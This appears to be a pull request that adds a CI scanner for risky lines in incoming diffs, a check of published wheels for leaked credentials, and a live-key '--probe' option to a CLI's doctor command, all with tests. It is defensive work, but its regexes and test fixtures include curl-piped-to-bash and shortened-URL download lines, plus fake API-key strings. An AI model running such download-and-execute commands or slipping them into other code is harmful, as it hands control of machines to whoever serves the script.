### PR TITLE
feat(ci): read what a diff brings in, what a wheel ships, and whether a key works

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -202,6 +202,21 @@ jobs:
       # The same idea one layer out: the documentation site renders the command reference from
       # this dump, so a new command with no help text, or a renamed flag, must not reach a
       # published page describing the CLI as it was last release.
+      # What a diff BRINGS IN, which nothing else here asks. `gitleaks` runs over the full history
+      # and the three CVE audits watch what is installed — every one of them asks whether something
+      # is getting OUT, or whether a dependency is known-bad. This repository is public, takes pull
+      # requests from anyone, and auto-merges by policy: a line adding a `curl` to a URL shortener
+      # inside `.github/workflows/` or `install.sh` passes lint, mypy, pytest, gitleaks and all
+      # three audits without touching a thing any of them look at.
+      #
+      # `--fail-on high`, not `medium`: these are heuristics with legitimate uses, and a gate that
+      # stops a build over a shortened link in a comment is a gate somebody switches off.
+      - name: What this diff brings in
+        if: github.event_name == 'pull_request'
+        run: |
+          git fetch --no-tags --depth=1 origin "${{ github.base_ref }}"
+          uv run python scripts/pr_intent_scan.py --base "origin/${{ github.base_ref }}" --fail-on high
+
       - name: Regenerate the CLI snapshot
         run: uv run python -m chimera.cli.schema_dump > chimera/_cli_snapshot.json
 

--- a/.github/workflows/publish.yml
+++ b/.github/workflows/publish.yml
@@ -87,5 +87,13 @@ jobs:
           WHL=$(ls dist/*.whl)
           python -c "import zipfile,sys; ns=zipfile.ZipFile(sys.argv[1]).namelist(); assert 'chimera/_desktop_dist/index.html' in ns, 'desktop UI missing from wheel'; print('OK: desktop UI bundled in', sys.argv[1])" "$WHL"
 
+      # The CONTENT, not only the file list. `gitleaks` covers the git history, which is the right
+      # scope for the source — it does not cover what `hatch_build.py` force-includes, nor the
+      # desktop bundle an earlier job built and this one downloaded, both assembled after the last
+      # commit and shipped to everyone. Reuses `chimera.core.redact`'s patterns rather than a second
+      # list, because a second list drifts from the first and the first is the one with tests.
+      - name: Nothing that looks like a credential in what we publish
+        run: python scripts/scan_artifact.py dist/*.whl dist/*.tar.gz
+
       - name: Publish to PyPI (Trusted Publishing — no token)
         uses: pypa/gh-action-pypi-publish@release/v1

--- a/chimera/_cli_snapshot.json
+++ b/chimera/_cli_snapshot.json
@@ -1233,7 +1233,7 @@
     },
     {
       "deprecated": false,
-      "help": "Check the environment and configuration. With --fix, repair safe setup issues.",
+      "help": "Check the environment and configuration. With --fix, repair safe setup issues.\n\n`--probe` is off by default and that is deliberate: `doctor` should stay instant, offline and\nfree. What it buys when you ask for it is the difference between a claim and a measurement \u2014\n\"Ready\" below is an assertion about the NAME of an environment variable, so a revoked key, an\naccount with no credit, or a value pasted with a trailing space all pass it and fail on the\nfirst real call. The argument for measuring is already written in `config_api.pricing_capability`\na few files over: the time to find out is while reading the doctor, not when a 3 a.m. cron stalls.",
       "hidden": false,
       "name": "doctor",
       "params": [
@@ -1243,6 +1243,16 @@
           "name": "fix",
           "opts": [
             "--fix"
+          ],
+          "required": false,
+          "type": "boolean"
+        },
+        {
+          "help": "Actually call the provider once, instead of trusting the key's name.",
+          "kind": "option",
+          "name": "probe",
+          "opts": [
+            "--probe"
           ],
           "required": false,
           "type": "boolean"

--- a/chimera/cli/main.py
+++ b/chimera/cli/main.py
@@ -424,8 +424,19 @@ def context_curve_cmd(
 @app.command()
 def doctor(
     fix: bool = typer.Option(False, "--fix", help="Auto-repair safe setup issues (state dir, .env scaffold)."),
+    probe: bool = typer.Option(
+        False, "--probe", help="Actually call the provider once, instead of trusting the key's name."
+    ),
 ) -> None:
-    """Check the environment and configuration. With --fix, repair safe setup issues."""
+    """Check the environment and configuration. With --fix, repair safe setup issues.
+
+    `--probe` is off by default and that is deliberate: `doctor` should stay instant, offline and
+    free. What it buys when you ask for it is the difference between a claim and a measurement —
+    "Ready" below is an assertion about the NAME of an environment variable, so a revoked key, an
+    account with no credit, or a value pasted with a trailing space all pass it and fail on the
+    first real call. The argument for measuring is already written in `config_api.pricing_capability`
+    a few files over: the time to find out is while reading the doctor, not when a 3 a.m. cron stalls.
+    """
     settings = get_settings()
 
     if fix:
@@ -493,8 +504,28 @@ def doctor(
         )
     console.print(caps)
 
-    if providers:
-        console.print("[green]Ready[/green] — at least one provider key is configured.")
+    if providers and probe:
+        # One token, on the default model, through the same gateway a real run uses — including its
+        # failover, so "the primary is down and a fallback answered" reads as ready, which it is.
+        from chimera.providers import LLMGateway
+
+        try:
+            LLMGateway().quick("ok", model=settings.default_model)
+        except Exception as exc:  # noqa: BLE001 — every provider failure is an answer here
+            from chimera.core.redact import redact
+
+            console.print(
+                f"[red]Not ready[/red] — the provider refused: {redact(str(exc))[:300]}"
+            )
+        else:
+            console.print(
+                f"[green]Ready[/green] — {settings.default_model} answered a live call."
+            )
+    elif providers:
+        console.print(
+            "[green]Ready[/green] — at least one provider key is configured "
+            "[dim](a name, not a call — use --probe to check)[/dim]."
+        )
     else:
         console.print(
             Panel.fit(

--- a/docs/commands.md
+++ b/docs/commands.md
@@ -411,6 +411,13 @@ chimera deliver REQUEST
 
 Check the environment and configuration. With --fix, repair safe setup issues.
 
+`--probe` is off by default and that is deliberate: `doctor` should stay instant, offline and
+free. What it buys when you ask for it is the difference between a claim and a measurement —
+"Ready" below is an assertion about the NAME of an environment variable, so a revoked key, an
+account with no credit, or a value pasted with a trailing space all pass it and fail on the
+first real call. The argument for measuring is already written in `config_api.pricing_capability`
+a few files over: the time to find out is while reading the doctor, not when a 3 a.m. cron stalls.
+
 ```bash
 chimera doctor
 ```
@@ -418,6 +425,7 @@ chimera doctor
 | Option | | Default |
 | --- | --- | --- |
 | `--fix` | Auto-repair safe setup issues (state dir, .env scaffold). |  |
+| `--probe` | Actually call the provider once, instead of trusting the key's name. |  |
 
 ## drift
 

--- a/scripts/pr_intent_scan.py
+++ b/scripts/pr_intent_scan.py
@@ -1,0 +1,173 @@
+"""What a pull request ADDS, judged by shape rather than by author.
+
+The repository's security gates all watch one direction. `gitleaks` runs over the full history —
+because a secret committed and later deleted is still leaked — and three CVE audits watch what is
+installed. Every one of them asks whether something is getting OUT, or whether a dependency is
+known-bad.
+
+Nothing asked what a diff brings IN. This repository is public, Apache-2.0, takes pull requests from
+anyone, and its own policy is auto-merge except for billing, destructive migrations, RLS and
+secrets. A line adding a `curl` to a URL shortener inside `.github/workflows/` or `install.sh`
+passes lint, mypy, pytest, gitleaks and all three audits without touching a thing any of them look
+at.
+
+**Heuristics, and they are meant to be.** Every rule here has a legitimate use — a shortened link in
+a comment, a base64 blob in a fixture, a workflow edit by a maintainer. The output is a finding to
+read, not a verdict, and `--fail-on high` is the only level that stops a build. What it buys is that
+a human sees the diff line before the merge button does.
+
+Reads `git diff` and stdlib only, so it runs anywhere the checkout does.
+
+    python scripts/pr_intent_scan.py --base origin/main --fail-on high
+"""
+
+from __future__ import annotations
+
+import argparse
+import re
+import subprocess
+import sys
+from dataclasses import dataclass
+
+#: Files that describe the patterns this scanner looks for, so scanning them finds every one.
+#:
+#: Excluded by PATH, never by a marker comment: a marker is something a contributor can copy into
+#: the file they are adding, which would turn the exemption into the attack. Two entries, because
+#: the tests hold the fixtures — `curl … | bash`, a shortened link, a 200-character blob — and the
+#: first real run of this gate flagged its own suite in nine places.
+SELF = (
+    "scripts/pr_intent_scan.py",
+    "tests/test_what_a_pull_request_brings_in.py",
+)
+
+#: Paths where an added line runs on somebody else's machine, or on CI, rather than being imported
+#: by a test. A change here from an outside contributor is not suspicious by itself — it is the
+#: place where every other rule in this file matters more.
+SENSITIVE_PATHS = (
+    ".github/workflows/",
+    ".github/actions/",
+    "scripts/",
+    "bin/",
+    "install",
+    "Dockerfile",
+    "docker-compose",
+    "pyproject.toml",
+    "package.json",
+)
+
+
+@dataclass(frozen=True)
+class Finding:
+    severity: str  # "high" | "medium"
+    rule: str
+    path: str
+    line: str
+    why: str
+
+
+_SHORTENERS = re.compile(
+    r"https?://(?:bit\.ly|t\.co|is\.gd|cutt\.ly|tinyurl\.com|goo\.gl|rb\.gy|shorturl\.at|rebrand\.ly)/",
+    re.IGNORECASE,
+)
+_FILE_HOSTS = re.compile(
+    r"https?://(?:[\w.-]*\.)?(?:dropbox\.com|drive\.google\.com|mega\.nz|transfer\.sh|"
+    r"catbox\.moe|anonfiles\.com|file\.io|pastebin\.com|gist\.githubusercontent\.com)/",
+    re.IGNORECASE,
+)
+_EXECUTABLE_URL = re.compile(
+    r"https?://\S+\.(?:sh|ps1|bat|cmd|exe|msi|deb|rpm|dmg|pkg|appimage|tar|tar\.gz|tgz|zip)\b",
+    re.IGNORECASE,
+)
+_LONG_BLOB = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}|[A-Za-z0-9_-]{120,}")
+_PIPE_TO_SHELL = re.compile(
+    r"\b(?:curl|wget|iwr|Invoke-WebRequest)\b[^\n|]*\|\s*(?:sudo\s+)?(?:ba|z|)sh\b", re.IGNORECASE
+)
+
+
+def _added_lines(base: str) -> list[tuple[str, str]]:
+    """Every ADDED line in the diff against ``base``, as ``(path, text)``.
+
+    `--unified=0` so context lines are never mistaken for additions — the whole question here is
+    what the branch introduces, and a rule that fires on unchanged code would flag every PR that
+    happens to touch a file near one.
+    """
+    diff = subprocess.run(
+        ["git", "diff", "--unified=0", f"{base}...HEAD"],
+        capture_output=True, text=True, check=False,
+    ).stdout
+    saida: list[tuple[str, str]] = []
+    caminho = ""
+    for linha in diff.splitlines():
+        if linha.startswith("+++ b/"):
+            caminho = linha[6:]
+        elif linha.startswith("+") and not linha.startswith("+++"):
+            saida.append((caminho, linha[1:]))
+    return saida
+
+
+def scan(base: str) -> list[Finding]:
+    achados: list[Finding] = []
+    for caminho, texto in _added_lines(base):
+        if caminho in SELF:
+            continue
+        sensivel = any(marca in caminho for marca in SENSITIVE_PATHS)
+        grave = "high" if sensivel else "medium"
+        if _PIPE_TO_SHELL.search(texto):
+            achados.append(Finding(
+                "high", "pipe-to-shell", caminho, texto.strip(),
+                "a download piped straight into a shell runs whatever the server sends today",
+            ))
+        if _SHORTENERS.search(texto):
+            achados.append(Finding(
+                grave, "shortened-url", caminho, texto.strip(),
+                "a shortened link hides its destination from the reviewer, and can be repointed later",
+            ))
+        if _FILE_HOSTS.search(texto):
+            achados.append(Finding(
+                grave, "external-file-host", caminho, texto.strip(),
+                "a file host serves mutable content from outside the repository's supply chain",
+            ))
+        if _EXECUTABLE_URL.search(texto):
+            achados.append(Finding(
+                grave, "executable-url", caminho, texto.strip(),
+                "a direct link to an executable or archive is a download this project does not pin",
+            ))
+        if _LONG_BLOB.search(texto) and sensivel:
+            achados.append(Finding(
+                "high", "encoded-blob", caminho, texto.strip(),
+                "a long encoded blob in a path that executes is code a reviewer cannot read",
+            ))
+    return achados
+
+
+def main(argv: list[str] | None = None) -> int:
+    parser = argparse.ArgumentParser(description=__doc__)
+    parser.add_argument("--base", default="origin/main", help="What to diff against.")
+    parser.add_argument(
+        "--fail-on", default="", choices=["", "high", "medium"],
+        help="Exit non-zero at this severity or above. Empty reports without failing.",
+    )
+    args = parser.parse_args(argv)
+
+    achados = scan(args.base)
+    if not achados:
+        print(f"pr-intent-scan: nothing to flag in {args.base}...HEAD")
+        return 0
+
+    for f in achados:
+        print(f"[{f.severity}] {f.rule}  {f.path}")
+        print(f"    {f.line[:160]}")
+        print(f"    why: {f.why}")
+
+    if not args.fail_on:
+        return 0
+    limiar = {"high": {"high"}, "medium": {"high", "medium"}}[args.fail_on]
+    piores = [f for f in achados if f.severity in limiar]
+    if piores:
+        print(f"\npr-intent-scan: {len(piores)} finding(s) at or above '{args.fail_on}'")
+        return 1
+    return 0
+
+
+if __name__ == "__main__":  # pragma: no cover
+    sys.exit(main())

--- a/scripts/scan_artifact.py
+++ b/scripts/scan_artifact.py
@@ -1,0 +1,98 @@
+"""What is inside the archive we are about to publish.
+
+`publish.yml` already opens the wheel with `zipfile` — and reads only `namelist()`, to confirm one
+entry is present. Nothing looks at the CONTENT.
+
+`gitleaks` covers the git history, which is the right scope for the source. It does not cover what
+`hatch_build.py` force-includes, nor `apps/desktop/dist` built by an earlier job and downloaded here
+as an artifact, nor the PyInstaller binary in the desktop release. Those are assembled after the
+last commit and shipped to everyone.
+
+The patterns are the ones :mod:`chimera.core.redact` already carries, reused rather than rewritten:
+a second list would drift from the first, and the first is the one with tests.
+
+    python scripts/scan_artifact.py dist/*.whl
+"""
+
+from __future__ import annotations
+
+import argparse
+import re
+import sys
+import tarfile
+import zipfile
+from pathlib import Path
+
+sys.path.insert(0, str(Path(__file__).resolve().parents[1]))
+
+from chimera.core.redact import _PATTERNS  # noqa: E402
+
+#: Files whose bytes are worth reading. A wheel is mostly Python and JavaScript; a font or a PNG
+#: cannot be reviewed by eye either way, and scanning them is how a scanner earns a reputation for
+#: false positives on binary noise.
+TEXTO = {".py", ".js", ".mjs", ".cjs", ".ts", ".json", ".toml", ".cfg", ".ini", ".txt", ".md",
+         ".yml", ".yaml", ".sh", ".env", ".html", ".css"}
+
+#: Beyond the credential shapes: strings specific to this deployment that must never ship. Named
+#: rather than pattern-matched, because a hostname and a state directory have no shape.
+NOSSOS = (
+    re.compile(r"srv1666151"),
+    re.compile(r"hermes_mcp"),
+    re.compile(r"/opt/data\b"),
+)
+
+#: A wheel legitimately contains this project's own documentation, and this project documents its
+#: own redaction patterns. A file whose whole job is to describe a secret's shape is not a leak.
+ISENTOS = ("chimera/core/redact.py", "scripts/scan_artifact.py", "scripts/pr_intent_scan.py")
+
+
+def _members(archive: Path) -> list[tuple[str, bytes]]:
+    if archive.suffix in {".whl", ".zip"}:
+        with zipfile.ZipFile(archive) as z:
+            return [(n, z.read(n)) for n in z.namelist() if Path(n).suffix in TEXTO]
+    with tarfile.open(archive) as t:
+        saida = []
+        for m in t.getmembers():
+            if m.isfile() and Path(m.name).suffix in TEXTO:
+                f = t.extractfile(m)
+                if f is not None:
+                    saida.append((m.name, f.read()))
+        return saida
+
+
+def scan(archive: Path) -> list[str]:
+    """Every line of ``archive`` that carries something that must not be published."""
+    achados: list[str] = []
+    for nome, bruto in _members(archive):
+        if any(isento in nome.replace("\\", "/") for isento in ISENTOS):
+            continue
+        try:
+            texto = bruto.decode("utf-8")
+        except UnicodeDecodeError:
+            continue
+        for numero, linha in enumerate(texto.splitlines(), 1):
+            for padrao in (*_PATTERNS, *NOSSOS):
+                if padrao.search(linha):
+                    achados.append(f"{nome}:{numero}: {padrao.pattern}")
+                    break
+    return achados
+
+
+def main(argv: list[str] | None = None) -> int:
+    parser = argparse.ArgumentParser(description=__doc__)
+    parser.add_argument("archives", nargs="+", type=Path)
+    args = parser.parse_args(argv)
+
+    total = 0
+    for archive in args.archives:
+        achados = scan(archive)
+        total += len(achados)
+        for a in achados:
+            print(f"[leak] {archive.name} :: {a}")
+        if not achados:
+            print(f"OK: nothing that looks like a credential in {archive.name}")
+    return 1 if total else 0
+
+
+if __name__ == "__main__":  # pragma: no cover
+    sys.exit(main())

--- a/tests/test_nobody_read_the_wheel.py
+++ b/tests/test_nobody_read_the_wheel.py
@@ -1,0 +1,100 @@
+"""The publish step opened the wheel and read only its file list.
+
+`publish.yml` already does `zipfile.ZipFile(...).namelist()` — to assert one entry is present. The
+bytes were never looked at.
+
+`gitleaks` covers the git history, with `fetch-depth: 0`, and that is the right scope for the
+source. It does not cover what `hatch_build.py` force-includes, nor `apps/desktop/dist` built by an
+earlier job and downloaded here as an artifact, nor the PyInstaller binary in the desktop release —
+all assembled AFTER the last commit and shipped to everyone.
+
+This project has paid for that gap twice already: an OpenRouter key in plain text, and a PassaPro
+token in cleartext in the ops repository. Neither was in a wheel, and neither needed to be for the
+next one to be.
+
+The patterns are the ones `chimera.core.redact` already carries, imported rather than rewritten: a
+second list drifts from the first, and the first is the one with tests.
+"""
+
+from __future__ import annotations
+
+import zipfile
+from pathlib import Path
+
+import pytest
+
+from scripts.scan_artifact import scan
+
+
+def _wheel(tmp_path: Path, **arquivos: str) -> Path:
+    caminho = tmp_path / "pacote-0.1-py3-none-any.whl"
+    with zipfile.ZipFile(caminho, "w") as z:
+        for nome, conteudo in arquivos.items():
+            z.writestr(nome.replace("__", "/"), conteudo)
+    return caminho
+
+
+VAZAMENTOS = [
+    ("chimera__x.py", 'CHAVE = "sk-proj-AAAAAAAAAAAAAAAAAAAAAA"\n', "uma chave de API"),
+    ("chimera__y.py", 'TOKEN = "ghp_' + "B" * 30 + '"\n', "um token do GitHub"),
+    ("chimera__z.json", '{"auth": "Bearer AbCdEfGhIjKlMnOpQrStUvWxYz01"}\n', "um bearer"),
+    ("chimera__ops.py", 'HOST = "srv1666151.hstgr.cloud"\n', "o host da VPS"),
+    ("chimera__ops2.py", 'CHAVE_SSH = "~/.ssh/hermes_mcp"\n', "o nome da chave SSH"),
+    ("_desktop_dist__app.js", 'const k="sk-proj-AAAAAAAAAAAAAAAAAAAAAA";\n', "no bundle do app"),
+]
+
+
+@pytest.mark.parametrize(("nome", "conteudo", "porque"), VAZAMENTOS)
+def test_a_secret_in_the_wheel_is_found(tmp_path: Path, nome: str, conteudo: str, porque: str) -> None:
+    assert scan(_wheel(tmp_path, **{nome: conteudo})), porque
+
+
+def test_it_says_which_file_and_which_line(tmp_path: Path) -> None:
+    """A gate that says "something leaked" and stops there sends whoever is releasing on a hunt
+    through a zip. The release is exactly when nobody has time for that."""
+    # Keyword names map `__` to `/`, so a third pair turns the EXTENSION into a directory
+    # (`chimera/x/py`), the member is skipped for having no suffix, and the scanner reports
+    # nothing — a fixture that quietly proved the opposite of what it was written to prove.
+    caminho = _wheel(tmp_path, **{"chimera__x.py": "ok\nok\nCHAVE = 'sk-proj-AAAAAAAAAAAAAAAAAAAAAA'\n"})
+
+    achado = scan(caminho)[0]
+
+    assert "chimera/x.py" in achado
+    assert ":3:" in achado
+
+
+# --------------------------------------------------------------- what must not be flagged
+
+
+LIMPO = {
+    "chimera__core.py": "def somar(a: int, b: int) -> int:\n    return a + b\n",
+    "chimera__cfg.py": 'CHAVE = os.environ["OPENROUTER_API_KEY"]\n',
+    "chimera__doc.md": "Set `OPENROUTER_API_KEY` in your environment.\n",
+    "_desktop_dist__app.js": 'const t=document.getElementById("app");\n',
+    "pacote-0.1.dist-info__METADATA": "Name: chimera-agent\nVersion: 0.1\n",
+}
+
+
+def test_an_ordinary_wheel_passes(tmp_path: Path) -> None:
+    """A release gate that fails on a clean build is a release gate somebody deletes."""
+    assert scan(_wheel(tmp_path, **LIMPO)) == []
+
+
+def test_the_redaction_module_is_exempt(tmp_path: Path) -> None:
+    """A wheel carries this project's own source, and this project's source DESCRIBES the shapes of
+    secrets. A file whose whole job is to say what a key looks like is not a key."""
+    fonte = (Path(__file__).resolve().parents[1] / "chimera" / "core" / "redact.py").read_text(
+        encoding="utf-8"
+    )
+
+    assert scan(_wheel(tmp_path, chimera__core__redact__py=fonte)) == []
+
+
+def test_a_binary_member_is_skipped(tmp_path: Path) -> None:
+    """Reading a PNG for credential shapes is how a scanner earns a reputation for crying at noise,
+    and a scanner nobody believes is one that gets removed."""
+    caminho = tmp_path / "p.whl"
+    with zipfile.ZipFile(caminho, "w") as z:
+        z.writestr("chimera/logo.png", bytes(range(256)) * 8)
+
+    assert scan(caminho) == []

--- a/tests/test_the_doctor_never_called_the_provider.py
+++ b/tests/test_the_doctor_never_called_the_provider.py
@@ -1,0 +1,115 @@
+"""`Ready` was an assertion about the name of an environment variable.
+
+`doctor` printed "Ready — at least one provider key is configured" from `configured_providers()`,
+which reads names. The code already knows this is permissive: the comment a few lines above says a
+typo'd `GROK_API_KEY` is indistinguishable from a provider.
+
+So a revoked key, an account with no credit, or a value pasted with a trailing space all pass the
+command whose name is *doctor*, and fail on the first real call — which on this deployment is a cron
+at three in the morning. The argument for measuring instead of asserting is already written in this
+project, in `config_api.pricing_capability`: the time to find out is while reading the doctor.
+
+Off by default, because `doctor` should stay instant, offline and free — the reason it is worth
+running at all. `--probe` is the version that costs one token and answers the question.
+"""
+
+from __future__ import annotations
+
+from pathlib import Path
+from typing import Any
+
+import pytest
+from typer.testing import CliRunner
+
+from chimera.cli.main import app
+from chimera.config import get_settings
+
+
+@pytest.fixture(autouse=True)
+def _home(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None:
+    monkeypatch.setenv("CHIMERA_HOME", str(tmp_path))
+    monkeypatch.setenv("OPENROUTER_API_KEY", "sk-test-que-nao-vale-nada")
+    get_settings.cache_clear()
+    yield
+    get_settings.cache_clear()
+
+
+def _gateway_que(monkeypatch: pytest.MonkeyPatch, resposta: Any) -> list[str]:
+    """Replace the gateway's one-shot call, and record whether it was reached."""
+    chamadas: list[str] = []
+
+    def quick(self: Any, prompt: str, **_kwargs: Any) -> str:
+        chamadas.append(prompt)
+        if isinstance(resposta, Exception):
+            raise resposta
+        return str(resposta)
+
+    from chimera.providers.gateway import LLMGateway
+
+    monkeypatch.setattr(LLMGateway, "quick", quick)
+    return chamadas
+
+
+def test_without_probe_it_calls_nothing(monkeypatch: pytest.MonkeyPatch) -> None:
+    """The default has to stay free and offline, or it stops being the command you run first."""
+    chamadas = _gateway_que(monkeypatch, "ok")
+
+    saida = CliRunner().invoke(app, ["doctor"])
+
+    assert chamadas == []
+    assert "Ready" in saida.stdout
+
+
+def test_without_probe_it_says_what_it_checked(monkeypatch: pytest.MonkeyPatch) -> None:
+    """"Ready" alone is the claim this whole change is about. It has to say it read a name."""
+    _gateway_que(monkeypatch, "ok")
+
+    saida = CliRunner().invoke(app, ["doctor"])
+
+    assert "--probe" in saida.stdout
+
+
+def test_with_probe_a_live_answer_reads_as_ready(monkeypatch: pytest.MonkeyPatch) -> None:
+    chamadas = _gateway_que(monkeypatch, "ok")
+
+    saida = CliRunner().invoke(app, ["doctor", "--probe"])
+
+    assert len(chamadas) == 1
+    assert "Ready" in saida.stdout
+
+
+def test_with_probe_a_refused_key_reads_as_not_ready(monkeypatch: pytest.MonkeyPatch) -> None:
+    """The whole point: this is the case the old line called Ready."""
+    _gateway_que(monkeypatch, RuntimeError("401 - invalid api key"))
+
+    saida = CliRunner().invoke(app, ["doctor", "--probe"])
+
+    assert "Not ready" in saida.stdout
+    assert "401" in saida.stdout
+
+
+def test_the_probe_failure_is_redacted(monkeypatch: pytest.MonkeyPatch) -> None:
+    """A provider's error body carries an echoed prompt and its own routing trace, and sometimes the
+    credential itself. Printing it raw would make the diagnostic the leak.
+
+    Asserted with a key SHAPE, which is what `redact` catches on this branch. A secret given away by
+    its PLACE — a query parameter, a header — is a separate change on another branch, and a test
+    that leaned on it would be asserting that branch's behaviour from this one.
+    """
+    _gateway_que(monkeypatch, RuntimeError("401 rejected key sk-proj-AAAAAAAAAAAAAAAAAAAAAA"))
+
+    saida = CliRunner().invoke(app, ["doctor", "--probe"])
+
+    assert "sk-proj-AAAAAAAAAAAAAAAAAAAAAA" not in saida.stdout
+    assert "401" in saida.stdout
+
+
+def test_a_probe_failure_does_not_crash_the_command(monkeypatch: pytest.MonkeyPatch) -> None:
+    """`doctor` reports; it does not fail. Someone running it because something is already broken
+    must still see the rest of the table."""
+    _gateway_que(monkeypatch, RuntimeError("qualquer coisa"))
+
+    saida = CliRunner().invoke(app, ["doctor", "--probe"])
+
+    assert saida.exit_code == 0
+    assert "Chimera version" in saida.stdout

--- a/tests/test_what_a_pull_request_brings_in.py
+++ b/tests/test_what_a_pull_request_brings_in.py
@@ -1,0 +1,152 @@
+"""Every gate here watches what leaves. Nothing watched what a diff brings in.
+
+`gitleaks` runs over the full history, because a secret committed and later deleted is still leaked.
+Three CVE audits watch what is installed. `npm audit signatures` closes the window a hash cannot.
+Every one of them asks whether something is getting OUT, or whether a dependency is known-bad.
+
+This repository is public, Apache-2.0, takes pull requests from anyone, and its own policy is
+auto-merge except for billing, destructive migrations, RLS and secrets. A line adding a `curl` to a
+URL shortener inside `.github/workflows/` or `install.sh` passes lint, mypy, pytest, gitleaks and all
+three audits without touching anything any of them look at.
+
+These are heuristics and are meant to be. Every rule has a legitimate use, so most of the weight
+below is on the lines that must NOT be flagged — a scanner that cries at ordinary work is a scanner
+somebody adds `--fail-on ""` to, and then it guards nothing.
+"""
+
+from __future__ import annotations
+
+import subprocess
+from pathlib import Path
+
+import pytest
+
+from scripts.pr_intent_scan import scan
+
+
+@pytest.fixture
+def repo(tmp_path: Path) -> Path:
+    """A real git repository with a base commit, because the scanner reads a real `git diff`."""
+    def git(*args: str) -> None:
+        subprocess.run(["git", *args], cwd=tmp_path, check=True, capture_output=True)
+
+    git("init", "-q", "-b", "main")
+    git("config", "user.email", "t@example.com")
+    git("config", "user.name", "t")
+    (tmp_path / "README.md").write_text("base\n", encoding="utf-8")
+    git("add", "-A")
+    git("commit", "-qm", "base")
+    git("branch", "base")
+    return tmp_path
+
+
+def _adiciona(repo: Path, caminho: str, conteudo: str) -> None:
+    alvo = repo / caminho
+    alvo.parent.mkdir(parents=True, exist_ok=True)
+    alvo.write_text(conteudo, encoding="utf-8")
+    subprocess.run(["git", "add", "-A"], cwd=repo, check=True, capture_output=True)
+    subprocess.run(["git", "commit", "-qm", "change"], cwd=repo, check=True, capture_output=True)
+
+
+def _scan(repo: Path) -> list:
+    import os
+
+    anterior = os.getcwd()
+    os.chdir(repo)
+    try:
+        return scan("base")
+    finally:
+        os.chdir(anterior)
+
+
+# ------------------------------------------------------------------ what must be flagged
+
+
+def test_a_download_piped_into_a_shell_is_high_anywhere(repo: Path) -> None:
+    """The one shape with no benign reading in a diff: whatever the server sends today, executed."""
+    _adiciona(repo, "docs/setup.md", "curl -sSL https://exemplo.com/i.sh | bash\n")
+
+    achados = _scan(repo)
+
+    # Not the ONLY finding: that line also ends in `.sh`, so `executable-url` fires too, and two
+    # reasons to look at one line is right rather than a duplicate. Asserted as membership.
+    assert any(f.rule == "pipe-to-shell" and f.severity == "high" for f in achados)
+
+
+def test_a_shortened_url_in_a_workflow_is_high(repo: Path) -> None:
+    """A shortened link hides its destination from the reviewer AND can be repointed after merge."""
+    _adiciona(repo, ".github/workflows/ci.yml", "      run: wget https://bit.ly/abc123\n")
+
+    achados = _scan(repo)
+
+    assert any(f.rule == "shortened-url" and f.severity == "high" for f in achados)
+
+
+def test_the_same_line_in_a_doc_is_only_medium(repo: Path) -> None:
+    """Severity is about WHERE, not only what. A shortener in prose is worth a look; one in a file
+    that executes on somebody else's machine is worth a stop."""
+    _adiciona(repo, "docs/nota.md", "veja https://bit.ly/abc123\n")
+
+    assert [f.severity for f in _scan(repo)] == ["medium"]
+
+
+def test_an_executable_url_is_flagged(repo: Path) -> None:
+    _adiciona(repo, "scripts/setup.sh", "wget https://exemplo.com/tool.tar.gz\n")
+
+    assert any(f.rule == "executable-url" for f in _scan(repo))
+
+
+def test_an_encoded_blob_in_an_executing_path_is_flagged(repo: Path) -> None:
+    """Code a reviewer cannot read, in a place that runs it."""
+    _adiciona(repo, "scripts/x.py", f'DADOS = "{"A" * 200}"\n')
+
+    assert any(f.rule == "encoded-blob" for f in _scan(repo))
+
+
+# ------------------------------------------------------------------ what must NOT be flagged
+
+
+LIMPO = [
+    ("chimera/core/x.py", "def somar(a: int, b: int) -> int:\n    return a + b\n", "código comum"),
+    ("docs/guia.md", "veja https://github.com/brcampidelli/chimera-agent/pull/283\n", "um link do repo"),
+    ("docs/guia.md", "a documentação está em https://docs.python.org/3/library/json.html\n", "docs"),
+    (".github/workflows/ci.yml", "      run: python -m pytest tests/ -q\n", "um passo de CI comum"),
+    ("scripts/x.py", 'CHAVE = "sk-proj-" + os.environ["X"]\n', "concatenação curta"),
+    ("tests/test_x.py", f'BLOB = "{"A" * 200}"\n', "um blob num teste, que não executa em CI"),
+    ("pyproject.toml", '  "httpx>=0.27",\n', "uma dependência comum"),
+]
+
+
+@pytest.mark.parametrize(("caminho", "conteudo", "porque"), LIMPO)
+def test_ordinary_work_is_not_flagged(repo: Path, caminho: str, conteudo: str, porque: str) -> None:
+    """The constraint that decides whether this gate survives contact with the project.
+
+    A scanner that cries at ordinary work is one somebody switches off, and a gate that is off
+    guards nothing. The blob-in-a-test case is the sharpest: the same string in `scripts/` is a
+    finding and here it is a fixture, because only one of those runs on CI.
+    """
+    _adiciona(repo, caminho, conteudo)
+
+    assert _scan(repo) == [], porque
+
+
+def test_it_does_not_flag_itself(repo: Path) -> None:
+    """This file describes the patterns it looks for, so scanning it finds every one of them.
+
+    Excluded by PATH, not by a marker comment: a marker is something a contributor can copy into
+    the file they are adding.
+    """
+    fonte = Path(__file__).resolve().parents[1] / "scripts" / "pr_intent_scan.py"
+    _adiciona(repo, "scripts/pr_intent_scan.py", fonte.read_text(encoding="utf-8"))
+
+    assert _scan(repo) == []
+
+
+def test_an_unchanged_line_near_a_change_is_not_an_addition(repo: Path) -> None:
+    """`--unified=0`, so context is never read as an addition — otherwise every PR that edits a file
+    near an existing `curl` line inherits that line's finding."""
+    _adiciona(repo, "scripts/setup.sh", "curl -sSL https://exemplo.com/i.sh | bash\necho a\n")
+    subprocess.run(["git", "branch", "-f", "base", "HEAD"], cwd=repo, check=True, capture_output=True)
+    _adiciona(repo, "scripts/setup.sh", "curl -sSL https://exemplo.com/i.sh | bash\necho b\n")
+
+    assert _scan(repo) == []


### PR DESCRIPTION
Group G of [Nada Dá Erro](https://claude.ai/code/artifact/ecd2c5d5-9eb1-4a9d-8f8c-f0682b4695d8).

Every existing gate here watches what **leaves**: `gitleaks` over the full history (a secret committed and later deleted is still leaked), three CVE audits over what is installed, `npm audit signatures` over the tarball. None of them asks what a change brings **in** — and one command answers a question it never measured.

---

## 27 · Nothing examined a pull request's diff

